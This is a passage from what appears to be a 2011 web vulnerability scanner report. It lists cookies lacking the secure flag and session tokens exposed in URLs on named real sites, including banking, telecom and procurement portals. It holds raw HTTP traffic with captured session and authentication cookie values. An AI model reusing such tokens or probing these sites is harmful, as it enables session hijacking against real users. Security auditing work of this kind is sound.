<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21618/serv3.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21618/serv3.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:31 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.7. https://eprocurement.eni.it/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://eprocurement.eni.it
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: eprocurement.eni.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 20899
Content-Type: text/html
Set-Cookie: view=id=%2C2%2C; path=/
Set-Cookie: option=i%5Fid%5Flang=2; expires=Tue, 01-May-2012 22:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBDSQRQ=DJHFOBHDKCGMFLBFLDPOIJJP; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-e
...[SNIP]...

10.8. https://secure.mightyblue.com/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:34 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=EEAKGJPDHNEFBMHOCDHJNHLA; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

10.9. https://secure.mightyblue.com/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:32 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=INBIJAJDCGCANBAFADADOAKF; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

10.10. https://www.sciencedirect.com/science  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.sciencedirect.com
Path:   /science

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /science?_ob=RegistrationURL&_method=display&_type=guest&_returnURL=http%3A%2F%2Fwww.sciencedirect.com%2Fscience%3F&_acct=C000050221&_version=1&_userid=10&md5=45e26359c93486a3badd56805f2eba73 HTTP/1.1
Host: www.sciencedirect.com
Connection: keep-alive
Referer: http://www.sciencedirect.com/science/journal/09574174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EUID=4d15f4a8-7503-11e0-b300-00008a0c593d; MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824585; TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; MIAMIAUTH=bf9bbfabc36a2d8c825558b831604b4d4ffcfbcf2a8d24615e09f2745b18af5a588c89bd9b9941c39dbf615f11954aac68ce91676c8b29af63c56d31d7055e130fb5e584b31984172d460b01785dd047312cc074ae0116baca1dad3ee7f334b15b598374f63143b8f5c3fb7e01b0c1b09c83977b5356ea63fde46ceb62456da6bd75a7fff3865929cba2e570ae113571af8dcff9f016b32ec08190e7f1a7bc6ae75511dac9a7329f9538ea44d9cba9d7a7dbe99055b96ad6e546454ffd28f7b3c36c5dda2c21ca2eddd7556e70451177e524b0f2a1cd5274abfa41d14fffd5999a5d42d95aa0919aedfde06b9fb8e6b7a38754814890011d98888a985f778857; BROWSER_SUPPORTS_COOKIES=1

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:41 GMT
Last-Modified: Mon, 02 May 2011 21:30:41 GMT
Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1136083128
Server: www.sciencedirect.com 9999 138.12.6.33:443
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRA
...[SNIP]...

10.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:08:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000w9xWq7hivnPBssNwcbAxeR4:13flmgm87; Path=/
Set-Cookie: WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...

10.12. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

11. Session token in URL  previous  next
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://job24.ilsole24ore.com
Path:   /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php HTTP/1.1
Host: job24.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:33 GMT
Server: Apache/2.0.46 (CentOS)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Connection: close
Content-Type: text/html; charset=ISO8859-1
Content-Length: 33489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml">
               <head>                    <title>Reality
...[SNIP]...
</a><a class="tab_art" href="http://qs.job24.ilsole24ore.com/sole_index.php?module=school_search&amp;page=results&amp;PHPSESSID=rtksooe85r2q5a3mc6csvc9a53">Top MBA</a>
...[SNIP]...

11.2. https://ui.zanox-affiliate.de/bin/z_in_frm.dll  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ui.zanox-affiliate.de
Path:   /bin/z_in_frm.dll

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /bin/z_in_frm.dll?1001100210030&0C0&981304374572_11-1 HTTP/1.1
Host: ui.zanox-affiliate.de
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e_lt=1304392580005%2C1; ed_u_s=%2C-1%2C0.1.2.8.9; e_se=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ui.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 34062


<!-- Template : 1012 - master_form_lo.htz - 1482 -->
<!-- Sprache : en - enen - 2 (Instanz: (default), Program: undefiniert) -->
<!-- Precomp : Freitag, 29. Mai 2009 11:33:07 von: "fvo" (Unicod
...[SNIP]...
<!-- Precomp : Dienstag, 23. Februar 2010 15:02:36 von: "mre" (Unicode-Verarbeitung) -->

<img width="1" height="1" src="https://www.zanox-affiliate.de/ppl/bin/z_dtqp.dll?53C1532755344&SessionID=[[20110503002722C451220491]]"><img width="1" height="1" src="https://ad.zanox.com/ppl/bin/z_dtqp.dll?53C1532755344&SessionID=[[20110503002722C451220491]]">
<script language="JavaScript">
...[SNIP]...

11.3. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://web.progress.com
Path:   /docs/gated/campaigns/bpm_search3.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1
Host: web.progress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f
Content-Length: 398
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 22:27:13 GMT
Connection: close
Set-Cookie: Apache=24.143.196.31.214591304375233885; expires=Wed, 28-Dec-2011 22:27:13 GMT; path=/
Cache-Control: no-store

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&amp;PERSIST=0&amp;TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f">here</a>
...[SNIP]...

11.4. http://www.autostrade.it/videoXml/previsioni-videoListSmall-it.xml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.autostrade.it
Path:   /videoXml/previsioni-videoListSmall-it.xml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /videoXml/previsioni-videoListSmall-it.xml?token=1304392414659 HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml, text/xml, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:14:03 GMT
Server: Autostrade
Last-Modified: Mon, 02 May 2011 19:40:06 GMT
ETag: "109e8-229a-4a25030c2d180"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
Content-Language: it
Content-Length: 8858

<?xml version="1.0" encoding="UTF-8"?>
<videoMediaListResponse>
<objects>


<videoMediaEntry>

<dataUrl>280420112200</dataUrl>
<plays>3</plays>

<views>9</views
...[SNIP]...

11.5. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.computerworld.com
Path:   /s/article/9214732/Semantic_Web_Tools_you_can_use

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /s/article/9214732/Semantic_Web_Tools_you_can_use HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Mon, 02 May 2011 22:33:54 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLSUQMTSV"
Cache-Control: public, max-age=226
Expires: Mon, 02 May 2011 22:33:41 GMT
Date: Mon, 02 May 2011 22:29:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
       <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

11.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.44.65
X-Cnection: close
Date: Mon, 02 May 2011 21:28:57 GMT
Content-Length: 0


11.7. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:12 GMT
Set-Cookie: JSESSIONID=D34A5D9383893442C0CECE0969DFDC09; Path=/
Set-Cookie: ATG_SESSION_ID=D34A5D9383893442C0CECE0969DFDC09; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<span><a href="http://www.shopping24.ilsole24ore.com/sh4/catalog/categories/rss.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140">RSS</a>
...[SNIP]...
<label><a href="/sh4/catalog/search/ricercaAvanzata.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">&rsaquo; Ricerca avanzata</a>
...[SNIP]...
<p>
   <a href="/sh4/catalog/order/cart.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-carrello.gif" width="37" height="26" alt="Carrello" title="Carrello" /></a><a href="/sh4/catalog/order/statoOrdine.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-statoordini-new.gif" width="82" height="26" alt="Stato degli ordini" title="Stato degli ordini"/></a><a href="/sh4/catalog/help/sh24-help.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-aiuto-new.gif" width="44" height="26" alt="Aiuto" title="Aiuto"/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Home</a>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246048"><img src="/sh4/img/ico_libri.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246200477"><img src="/sh4/img/ico_libri.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140"><img src="/sh4/img/ico_periodici.gif" alt="" title=""/>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246176">
               &nbsp;Agricoltura e Agroalimentare</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246174">
               &nbsp;Ambiente e Sicurezza</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245109662">
               &nbsp;Architettura</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090278">
               &nbsp;Casa e Arredo</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246170">
               &nbsp;Diritto</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246168">
               &nbsp;Economia D&#39;Impresa</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat550009">
               &nbsp;Economia e Finanza</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246166">
               &nbsp;Edilizia e Urbanistica</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090274">
               &nbsp;Elettronica e TLC</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246164">
               &nbsp;Enti Locali</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246162">
               &nbsp;Fisco</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090128">
               &nbsp;HoReCa</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246144">
               &nbsp;Immobili</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246158">
               &nbsp;Informazione Generale</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246156">
               &nbsp;Lavoro</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246142">
               &nbsp;Pubblica Amministrazione</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090126">
               &nbsp;Retail</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246152">
               &nbsp;Sanit.</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246150">
               &nbsp;Scuola</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat90002">
               &nbsp;Societ.</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246148">
               &nbsp;Societ. e Trasporti</a>
...[SNIP]...
<li>    <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090130">
           &nbsp;Telecomunicazioni e ICT</a>
...[SNIP]...
